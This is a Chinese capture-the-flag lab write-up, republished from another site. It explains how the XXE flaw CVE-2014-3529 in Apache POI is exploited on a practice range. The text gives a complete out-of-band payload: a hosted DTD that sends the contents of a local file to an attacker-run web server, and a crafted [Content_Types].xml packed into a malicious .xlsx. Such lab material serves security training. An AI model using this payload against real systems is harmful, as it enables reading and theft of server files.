声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
靶场介绍
Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。
春秋云镜开启靶场:
http://eci-2ze9wvzaypj11h8emteu.cloudeci1.ichunqiu.com:8080/
一:使用python开启一个web服务
python -m http.server 80
二:在web服务器目录下放一个xxe.dtd
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://127.0.0.1/%file;'>">
%all;
三: 制作包含payload的Excel
[Content_Types].xml
<!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % dtd SYSTEM "http://127.0.0.1/xxe.dtd">
%dtd; %send;]>
然后需要压缩[Content_Types].xml为zip文件
[Content_Types].zip修改为xxe.xlsx
靶场测试
上传xxe.xlsx文件
复制下来进行解析测试
回到web服务器可以查看到访问记录
即可成功获取flag文章来源:https://www.toymoban.com/news/detail-417843.html
文章来源地址https://www.toymoban.com/news/detail-417843.html
到了这里,关于[春秋云镜]CVE-2014-3529的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!